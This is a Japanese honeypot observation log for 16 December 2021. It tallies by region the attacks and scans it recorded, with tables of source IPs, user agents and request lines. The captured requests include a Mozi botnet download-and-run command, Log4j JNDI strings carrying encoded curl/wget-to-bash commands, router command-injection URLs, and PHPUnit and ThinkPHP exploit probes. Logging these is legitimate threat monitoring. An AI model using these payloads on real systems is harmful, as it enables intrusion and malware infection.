2021/12/16 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2021/12/16分です。

特徴

共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

Location:JP

PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
/.gitへのスキャン行為
WordPress Pluginへのスキャン行為

を確認しました。

Location:US

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
curlによるスキャン行為
/.gitへのスキャン行為
81.71.160.63に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://125.45.40.98:52385/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:UK

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
Nmap Scripting Engineによるスキャン行為
ZmEuによるスキャン行為
zgrabによるスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為
Gh0stRATのような動き

を確認しました。

Location:SG

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Nmap Scripting Engineによるスキャン行為
zgrabによるスキャン行為
5.188.210.227に関する不正通信
81.71.160.63に関する不正通信
UserAgentがHello, Worldであるアクセス

を確認しました。

他

アクセス数推移

JP：総アクセス数：145 (前日比：14)
US：総アクセス数：268 (前日比：185)
UK：総アクセス数：161 (前日比：115)
SG：総アクセス数：169 (前日比：102)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.56.57.56	Netherlands
2	3.239.174.91	United States
1	13.37.222.202	United States
4	13.89.227.118	United States
63	18.119.69.163	United States
4	23.250.19.242	Canada
1	34.142.45.182	United States
1	44.224.32.42	United States
1	45.61.185.177	United States
1	45.61.187.76	United States
1	45.61.187.215	United States
1	45.61.188.136	United States
8	47.90.249.228	United States
3	49.51.69.66	China
4	80.82.78.39	United Kingdom
1	104.244.73.9	United States
1	107.130.226.93	United States
1	107.189.5.172	United States
1	116.30.194.38	China
1	123.58.211.224	Hong Kong
13	135.125.244.48	France
1	143.110.227.92	United States
2	143.198.55.184	United States
1	143.244.189.0	United States
2	147.182.195.163	United States
1	159.65.126.220	United States
4	164.52.24.179	China
1	164.90.155.51	United States
1	165.232.92.7	United States
1	183.136.226.4	China
1	185.56.80.65	Seychelles
1	192.241.213.16	United States
1	192.241.213.149	United States
10	195.54.160.149	Russia
1	205.185.119.112	United States
1	205.185.126.142	United States
1	206.189.21.147	United States
1	209.17.97.114	United States

UserAgent一覧

件数	UserAgent
18	`-`
1	`Go-http-client/1.1`
2	`Mozila/5.0`
1	`Mozilla/5.0 (Linux; Android 6.0.1; SM-G532M Build/MMB29T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 6.0; vivo 1606 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0`
63	`Mozilla/5.0 (Windows NT 6.3; WOW64) Gecko/20032106 Firefox/12.0`
1	`Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0`
29	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; https[:]//www[.]jobboerse[.]com/bot.htm) Gecko/20100101 Firefox/38.0`
1	`Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)`
4	`Mozilla/5.0 (compatible;)`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) CriOS/69.0.3497.105 Mobile/15E148 Safari/604.1`
2	`Mozilla/5.0 zgrab/0.x`
2	`Mozilla/5.0`
2	`curl/7.75.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x16\x03\x01\x01\xfa\x01`
1		`\x16\x03\x01\x01`	\x01
3		`\x16\x03\x01\x02`
9		`\x16\x03\x01`
30	GET	`/.env`	HTTP/1.1
1	GET	`/.git`	HTTP/1.1
1	GET	`/.local`	HTTP/1.1
1	GET	`/.production`	HTTP/1.1
1	GET	`/.remote`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`//admin/.env`	HTTP/1.1
1	GET	`//administrator/.env`	HTTP/1.1
1	GET	`//api/.env`	HTTP/1.1
1	GET	`//app/.env`	HTTP/1.1
1	GET	`//apps/.env`	HTTP/1.1
1	GET	`//assets/.env`	HTTP/1.1
1	GET	`//config/.env`	HTTP/1.1
1	GET	`//core/.env`	HTTP/1.1
1	GET	`//core/Datavase/.env`	HTTP/1.1
1	GET	`//core/app/.env`	HTTP/1.1
1	GET	`//cron/.env`	HTTP/1.1
1	GET	`//cronlab/.env`	HTTP/1.1
1	GET	`//database/.env`	HTTP/1.1
1	GET	`//en/.env`	HTTP/1.1
1	GET	`//exapi/.env`	HTTP/1.1
1	GET	`//lab/.env`	HTTP/1.1
1	GET	`//laravel/.env`	HTTP/1.1
1	GET	`//lib/.env`	HTTP/1.1
1	GET	`//psnlink/.env`	HTTP/1.1
1	GET	`//public/.env`	HTTP/1.1
1	GET	`//saas/.env`	HTTP/1.1
1	GET	`//site/.env`	HTTP/1.1
1	GET	`//sitemaps/.env`	HTTP/1.1
1	GET	`//tools/.env`	HTTP/1.1
1	GET	`//uploads/.env`	HTTP/1.1
1	GET	`//v1/.env`	HTTP/1.1
1	GET	`//v2/.env`	HTTP/1.1
1	GET	`//vendor/.env`	HTTP/1.1
1	GET	`//web/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
2	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/guest/auth/sign-in`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
7	GET	`/login`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/text4041639551964`	HTTP/1.1
1	GET	`/tgbot.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/wp-content/uploads/2021/12/xem-phim-Phong-Khoi-Lac-Duong-Luoyang-2021--300x450.jpg`	HTTP/1.1
1	POST	`//admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//lib/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//lib/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//lib/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//vendor/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//vendor/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//vendor/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
2	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.56.57.56	Netherlands
1	20.211.30.34	United States
1	23.183.83.18	United States
1	23.183.83.241	United States
1	34.77.162.25	United States
1	34.105.187.190	United States
1	34.116.165.138	United States
1	34.118.104.193	United States
8	47.252.32.240	United States
2	52.148.137.198	United States
1	64.227.188.164	United States
4	80.82.78.39	United Kingdom
2	87.251.64.137	Russia
2	94.232.43.63	Russia
1	107.189.2.243	United States
1	109.237.103.123	Russia
210	111.13.127.129	China
1	125.45.40.98	China
1	139.162.145.250	Netherlands
1	139.177.201.30	United States
1	143.110.208.151	United States
1	143.110.227.92	United States
1	143.244.189.0	United States
2	147.182.195.163	United States
1	147.182.224.211	United States
2	147.182.232.128	United States
1	165.232.137.148	United States
1	165.232.142.210	United States
1	175.0.9.115	China
1	175.107.11.12	Pakistan
11	195.54.160.149	Russia
1	198.98.49.124	United States
1	209.17.97.114	United States
1	209.141.50.223	United States

UserAgent一覧

件数	UserAgent
2	`${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC42OC4xMTguODM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzQuNjguMTE4LjgzOjgwKXxiYXNo}`
13	`-`
1	`Hello, world`
4	`Mozila/5.0`
14	`Mozilla/5.0 (Linux; Android 5.0; SM-G920A) AppleWebKit (KHTML, like Gecko) Chrome Mobile Safari (compatible; AdsBot-Google-Mobile; +http[:]//www[.]google[.]com/mobile/adsbot.html)`
15	`Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http[:]//www[.]google[.]com/bot.html)`
15	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3599.0 Safari/537.36`
12	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3599.0 Safari/537.36`
15	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3599.0 Safari/537.36`
13	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3599.0 Safari/537.36`
16	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3599.0 Safari/537.36`
17	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3599.0 Safari/537.36`
12	`Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; rv:11.0) like Gecko`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.18247`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0`
1	`Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36`
12	`Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko`
15	`Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
12	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
10	`Mozilla/5.0 (compatible; Googlebot/2.1; +http[:]//www[.]google[.]com/bot.html)`
4	`Mozilla/5.0 (compatible;)`
1	`Mozilla/5.0 (iPad; CPU OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1`
14	`Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; AdsBot-Google-Mobile; +http[:]//www[.]google[.]com/mobile/adsbot.html)`
19	`Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http[:]//www[.]google[.]com/bot.html) Safari/537.36`
2	`Mozilla/5.0`
2	`curl/7.75.0`
1	`python-requests/2.9.1`

リクエスト内容一覧

件数	Method	Request	Protocol
4		`\x03`
2		`\x16\x03\x01\x02`
5		`\x16\x03\x01`
12	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
2	GET	`/?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC42OC4xMTguODM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzQuNjguMTE4LjgzOjgwKXxiYXNo}`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
2	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
2	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/guest/auth/sign-in`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
2	GET	`/login`	HTTP/1.1
1	GET	`/pv/spa122.cfg`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//125[.]45[.]40[.]98:52385/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/text4041639598621`	HTTP/1.1
1	GET	`/tgbot.php`	HTTP/1.1
1	GET	`/wp-content/uploads/2021/12/xem-phim-Phong-Khoi-Lac-Duong-Luoyang-2021--300x450.jpg`	HTTP/1.1
210	HEAD	`http[:]//81[.]71[.]160[.]63/cc.php`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
4	POST	`/HNAP1/`	HTTP/1.1
2	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
10	5.8.10.202	Russia
1	18.220.25.167	United States
1	23.183.81.15	United States
1	34.65.74.138	United States
1	34.116.157.159	United States
1	34.142.45.182	United States
1	34.159.28.90	United States
1	41.251.249.88	Morocco
1	42.230.121.43	China
1	58.248.148.145	China
1	80.82.70.228	United Kingdom
2	80.82.78.39	United Kingdom
1	104.214.48.14	United States
1	106.75.173.120	China
1	107.189.5.208	United States
1	109.237.103.123	Russia
61	130.61.227.230	United States
2	157.245.70.127	United States
5	178.62.22.232	United States
1	192.241.209.104	United States
1	192.241.210.50	United States
12	195.54.160.149	Russia
1	198.98.49.124	United States
1	198.98.60.234	United States
1	198.211.103.63	United States
1	209.17.96.42	United States
1	211.237.2.243	South Korea
48	212.192.216.94	Czechia

UserAgent一覧

件数	UserAgent
2	`${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzIuMTQ1LjY2LjM0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzMi4xNDUuNjYuMzQ6ODApfGJhc2g=}`
16	`-`
2	`Go-http-client/1.1`
4	`Mozila/5.0`
1	`Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; FunWebProducts)`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
3	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
61	`Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)`
1	`Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11 Safari/525.20`
2	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
1	`Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`
48	`ZmEu`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`Gh0st\xad`
1		`HELP`
7		`\x16\x03\x01`
1		`\x16\x03\x02\x01o\x01`
1		`\x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc\n`
1		`\xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff\n`
1	EIGF	`/`	HTTP/1.1
3	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
2	GET	`/?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzIuMTQ1LjY2LjM0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzMi4xNDUuNjYuMzQ6ODApfGJhc2g=}`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/_phpMyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
2	GET	`/aaa9`	HTTP/1.1
2	GET	`/aab9`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/acehorseracingbets-lays/db/phpmyadmin/scripts/setup.php`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/adm/scripts/setup.php`	HTTP/1.1
1	GET	`/admin/info/config`	HTTP/1.1
1	GET	`/admin/phpmyadmin/scripts/setup.php`	HTTP/1.1
1	GET	`/admincooptel/phpMyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`/alt/sqladmin/scripts/setup.php`	HTTP/1.1
1	GET	`/api/spec.json`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=user&psd=user`	HTTP/1.0
1	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/configuracion/phpmyadmin/scripts/setup.php`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/db/scripts/setup.php`	HTTP/1.1
1	GET	`/dbadmin/scripts/setup.php`	HTTP/1.1
1	GET	`/downloads/SemanaAcademica2007/MC07_Ajax/server/www/phpmyadmin/scripts/setup.php`	HTTP/1.1
1	GET	`/ext/ma/scripts/setup.php`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/guest/auth/sign-in`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
2	GET	`/login`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/mmss/phpMyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`/myadmin/scripts/setup.php`	HTTP/1.1
1	GET	`/mysql/scripts/setup.php`	HTTP/1.1
1	GET	`/mysql4/scripts/setup.php`	HTTP/1.1
1	GET	`/mysqladmin/scripts/setup.php`	HTTP/1.1
1	GET	`/mysqladminhksin/scripts/setup.php`	HTTP/1.1
1	GET	`/nmaplowercheck1639535660`	HTTP/1.1
1	GET	`/opc/v1/identity`	HTTP/1.1
1	GET	`/opc/v1/instance`	HTTP/1.1
1	GET	`/php/phpMyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`/php/phpmyadmin2102/scripts/setup.php`	HTTP/1.1
1	GET	`/php/scripts/setup.php`	HTTP/1.1
1	GET	`/phpMyAdmin-2.8.0.4/scripts/setup.php`	HTTP/1.1
1	GET	`/phpMyAdmin-2.8.2/scripts/setup.php`	HTTP/1.1
1	GET	`/phpMyAdmin-www072510/scripts/setup.php`	HTTP/1.1
2	GET	`/phpMyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`/phpMyAdmin2/scripts/setup.php`	HTTP/1.1
1	GET	`/phpMyAdminold/scripts/setup.php`	HTTP/1.1
1	GET	`/phpadmin/scripts/setup.php`	HTTP/1.1
1	GET	`/phpdbku/scripts/setup.php`	HTTP/1.1
1	GET	`/phpmy/scripts/setup.php`	HTTP/1.1
1	GET	`/phpmyadmin.box25/scripts/setup.php`	HTTP/1.1
1	GET	`/phpmyadmin/scripts/setup.ph`	HTTP/1.1
1	GET	`/phpmyadmin/scripts/setup.php/index.php`	HTTP/1.1
2	GET	`/phpmyadmin/scripts/setup.php`	HTTP/1.1
1	GET	`/phpmyadmin3/scripts/setup.php`	HTTP/1.1
1	GET	`/phpmyadmin_/scripts/setup.php`	HTTP/1.1
1	GET	`/pma/scripts/setup.php`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/pyaniste/mysqladmin/scripts/setup.php`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/scripts/setup.php`	HTTP/1.1
1	GET	`/secret123/phpmyadmin/scripts/setup.php`	HTTP/1.1
2	GET	`/server-status`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/spec/api.json`	HTTP/1.1
1	GET	`/sqladmin/scripts/setup.php`	HTTP/1.1
1	GET	`/ui`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/w00tw00t.at.blackhats.romanian.anti-sec:)`	HTTP/1.1
1	GET	`/web/phpMyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`/wordpress/wp-content/plugins/wp-phpmyadmin/phpmyadmin/scripts/setup.php`	HTTP/1.1
1	GET	`/wp-content/uploads/2021/12/xem-phim-Phong-Khoi-Lac-Duong-Luoyang-2021--300x450.jpg`	HTTP/1.1
1	GET	`/wp/wp-content/plugins/wp-phpmyadmin/phpmyadmin/scripts/setup.php`	HTTP/1.1
